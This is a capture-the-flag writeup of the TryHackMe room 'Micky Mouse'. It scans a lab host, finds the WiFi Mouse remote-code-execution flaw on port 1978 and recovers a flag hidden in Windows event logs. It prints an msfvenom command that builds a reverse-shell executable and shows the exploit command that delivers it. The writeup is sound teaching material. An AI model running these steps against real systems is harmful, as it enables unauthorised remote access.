# Micky Mouse Writeup

Room name: **Micky Mouse**

Room link: [**https://tryhackme.com/jr/yctfweekly**](https://tryhackme.com/jr/yctfweekly)

Description:

**When did Micky Mouse complete its half-century? Micky Mouse event was the best event in the world 😁 Can you find the flag of YCTF event?**

Hint 1: **Have you tried nmap -Pn**

(Direct/straight hint)

Hint 2: **Micky's 50 Mouse year might help! It's the way to get inside!**

(A quick Google search gives **1978** as the year of Micky's 50th anniversary)

<figure><img src="/files/RFBUkuGlcbyx2CUE2luk" alt=""><figcaption></figcaption></figure>

### Let's begin with the exploitation!

First we try to ping the machine, but get no response: ICMP is being blocked.

<figure><img src="/files/eHYwwmjmSvUxEw6r6Mjy" alt=""><figcaption></figcaption></figure>

**So, let's scan the target using rustscan**

```
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.145.192
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.145.192:1978
Open 10.10.145.192:3389
```

We can see above that ports **1978** and **3389** are open.

But a plain nmap scan reports the host as down:

```
┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -vv
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:16 EST
Initiating Ping Scan at 09:16
Scanning 10.10.145.192 [4 ports]
Completed Ping Scan at 09:17, 3.02s elapsed (1 total hosts)
Nmap scan report for 10.10.145.192 [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
           Raw packets sent: 8 (304B) | Rcvd: 0 (0B)
```

To get around this we add -Pn, which skips host discovery: nmap then treats the host as up and the port scan proceeds.

So we used the Nmap flags **-Pn (no ping scan), -O (OS detection) and -sV (service version detection)** to scan only ports 1978 and 3389.

```
┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -p1978,3389 -sV -O -Pn 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:33 EST
Nmap scan report for 10.10.145.192
Host is up (0.16s latency).

PORT     STATE SERVICE        VERSION
1978/tcp open  unisql?
3389/tcp open  ms-wbt-server?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1978-TCP:V=7.94%I=7%D=11/26%Time=65635732%P=x86_64-pc-linux-gnu%r(N
SF:ULL,13,"system\x20windows\x206\.1\n")%r(GenericLines,13,"system\x20wind
SF:ows\x206\.1\n")%r(GetRequest,13,"system\x20windows\x206\.1\n")%r(HTTPOp
SF:tions,13,"system\x20windows\x206\.1\n")%r(RTSPRequest,13,"system\x20win
SF:dows\x206\.1\n")%r(RPCCheck,13,"system\x20windows\x206\.1\n")%r(DNSVers
SF:ionBindReqTCP,13,"system\x20windows\x206\.1\n")%r(DNSStatusRequestTCP,1
SF:3,"system\x20windows\x206\.1\n")%r(Help,13,"system\x20windows\x206\.1\n
SF:")%r(SSLSessionReq,13,"system\x20windows\x206\.1\n")%r(TerminalServerCo
SF:okie,13,"system\x20windows\x206\.1\n")%r(TLSSessionReq,13,"system\x20wi
SF:ndows\x206\.1\n")%r(Kerberos,13,"system\x20windows\x206\.1\n")%r(SMBPro
SF:gNeg,13,"system\x20windows\x206\.1\n")%r(X11Probe,13,"system\x20windows
SF:\x206\.1\n")%r(FourOhFourRequest,13,"system\x20windows\x206\.1\n")%r(LP
SF:DString,13,"system\x20windows\x206\.1\n")%r(LDAPSearchReq,13,"system\x2
SF:0windows\x206\.1\n")%r(LDAPBindReq,13,"system\x20windows\x206\.1\n")%r(
SF:SIPOptions,13,"system\x20windows\x206\.1\n")%r(LANDesk-RC,13,"system\x2
SF:0windows\x206\.1\n")%r(TerminalServer,13,"system\x20windows\x206\.1\n")
SF:%r(NCP,13,"system\x20windows\x206\.1\n")%r(NotesRPC,13,"system\x20windo
SF:ws\x206\.1\n")%r(JavaRMI,13,"system\x20windows\x206\.1\n")%r(WMSRequest
SF:,13,"system\x20windows\x206\.1\n")%r(oracle-tns,13,"system\x20windows\x
SF:206\.1\n")%r(ms-sql-s,13,"system\x20windows\x206\.1\n")%r(afp,13,"syste
SF:m\x20windows\x206\.1\n")%r(giop,13,"system\x20windows\x206\.1\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 or Windows 8 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.61 seconds
```

We now know the OS family and that the service on port 1978 answers every probe with `system windows 6.1`. A simple search for **port 1978 unisql** leads to the first exploit result: **Wifi Mouse 1.7.8.5 - Remote Code Execution.**

<figure><img src="/files/WerXs4V5ySmKq3il0O2n" alt=""><figcaption></figcaption></figure>

Download the exploit <https://www.exploit-db.com/exploits/49601>

Before running it, create an **MSF payload** with msfvenom, specifying your own LHOST and LPORT:

```
┌──(root㉿kali)-[/]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=1234 -f exe > thmouse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
```

**Now in one tab, run the python http server**

<figure><img src="/files/SlU2jyjq4jZYvRI4vLbj" alt=""><figcaption></figcaption></figure>

**In the second tab, listen using netcat**

<figure><img src="/files/h0VBWrDA0Bzd3rapCDFg" alt=""><figcaption></figcaption></figure>

**In the third tab, run the exploit!!**

```
python3 mouse.py <Target IP> <tun0 IP> <Payload.exe>
```

<figure><img src="/files/Tad8UQg3YYqJtGRmOit8" alt=""><figcaption></figcaption></figure>

Holaa!! You got the **shell!**

<figure><img src="/files/l4aoLdUgR16u55sSmPeT" alt=""><figcaption></figcaption></figure>

Now read the description and the question again. What do they say?

It says, **Can you find the flag of YCTF event?**

That is the biggest hint: the word **EVENT** appears in both the description and the question.

<figure><img src="/files/NUzUZH6xj8mhlnjWOtvo" alt=""><figcaption></figcaption></figure>

Now it makes sense to look into the **Windows event logs**.

**Using the command** `wevtutil qe Application` we can dump every event in the Application log (the output is XML by default).

<figure><img src="/files/mPIPmoNENonwnoZvD2AZ" alt=""><figcaption></figcaption></figure>

Scrolling a little further down, we find the **fake flag**.

<figure><img src="/files/wIWflYqj1DSaLceCKvTF" alt=""><figcaption></figcaption></figure>

***So, I copied the whole log output to my machine and searched for Base64 strings manually. By searching for the string `==` we got one string:***

`ZGlkIHlvdSBjaGVjayBldmVudCBpZCA2OSBodWg/Cg==`


<figure><img src="/files/Gnw3IcCSKF1JVLoz6bLY" alt=""><figcaption></figcaption></figure>

Decoding the Base64 string with CyberChef gives another hint, which says:

***did you check event id 69 huh?***

<figure><img src="/files/jkd5Z0cD5uoQgAs2KmIU" alt=""><figcaption></figcaption></figure>

So I tried looking for event **ID 69**.

<figure><img src="/files/Zo6EHPMb9XHFLuLbWk5C" alt=""><figcaption></figcaption></figure>

If you look closely at event ID 69, there is a strange-looking string:

`594354467b5230306d5f667531315f30665f6d307535337d0a`

Pasting it into [CyberChef](https://gchq.github.io/CyberChef/) and applying the Hex decode (From Hex) operation gives us the actual flag!

**Flag:** `YCTF{R00m_fu11_0f_m0u53}`

<figure><img src="/files/hrZrXPylsnq97L7VeED8" alt=""><figcaption></figcaption></figure>
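Instead of scrolling through the `wevtutil` dump and searching for `==` by hand, the hunt for encoded strings in the log can be automated. The following is an added example, not part of the original writeup: it parses the XML that `wevtutil qe` emits, pulls the `<Data>` fields, and decodes any hex or Base64 tokens that come out as readable ASCII. The sample log is constructed; the `Provider Name='ctf'` and the event IDs other than 69 are invented.

```python
import base64
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed stand-in for `wevtutil qe Application` output (XML is its default format).
# Real output is a bare sequence of <Event> elements with no root; event 42 and 69 carry the room's strings.
SAMPLE = """
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='ctf'/><EventID Qualifiers='0'>1</EventID></System><EventData><Data>fake flag placeholder (constructed)</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='ctf'/><EventID Qualifiers='0'>42</EventID></System><EventData><Data>ZGlkIHlvdSBjaGVjayBldmVudCBpZCA2OSBodWg/Cg==</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='ctf'/><EventID Qualifiers='0'>69</EventID></System><EventData><Data>594354467b5230306d5f667531315f30665f6d307535337d0a</Data></EventData></Event>
"""

B64_RE = re.compile(r"\b[A-Za-z0-9+/]{16,}={0,2}")
HEX_RE = re.compile(r"\b(?:[0-9a-fA-F]{2}){8,}\b")


def _printable(raw):
    """Return the decoded text if it is clean ASCII, else None (random bytes are noise)."""
    try:
        text = raw.decode("ascii").strip()
    except UnicodeDecodeError:
        return None
    return text if text and text.isprintable() else None


def decode_candidates(text):
    """Return (kind, decoded) for hex/base64-looking tokens that decode to clean ASCII."""
    hits = []
    for m in HEX_RE.finditer(text):
        hits.append(("hex", _printable(bytes.fromhex(m.group()))))
    for m in B64_RE.finditer(text):
        if HEX_RE.fullmatch(m.group()):  # a pure hex run also matches the base64 pattern
            continue
        try:
            hits.append(("base64", _printable(base64.b64decode(m.group(), validate=True))))
        except ValueError:  # wrong length or padding: not real base64
            pass
    return [(kind, s) for kind, s in hits if s]


def find_encoded_strings(xml_text):
    """Map event ID -> decoded hits for every <Event> in wevtutil XML output."""
    root = ET.fromstring("<Events>" + xml_text + "</Events>")  # wrap: real output has no root
    found = {}
    for ev in root.findall("e:Event", NS):
        eid = int(ev.findtext("e:System/e:EventID", namespaces=NS))
        hits = [h for d in ev.findall("e:EventData/e:Data", NS) for h in decode_candidates(d.text or "")]
        if hits:
            found[eid] = hits
    return found
```

Run `wevtutil qe Application > app.xml` on the box and feed the file's contents to `find_encoded_strings`; only events whose data decodes to readable text are reported.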

Challenge Credits: [Munazir ](https://linkedin.com/in/Munazirul)

Hope you enjoyed the machine and learned new things from the challenge! 🌟📚
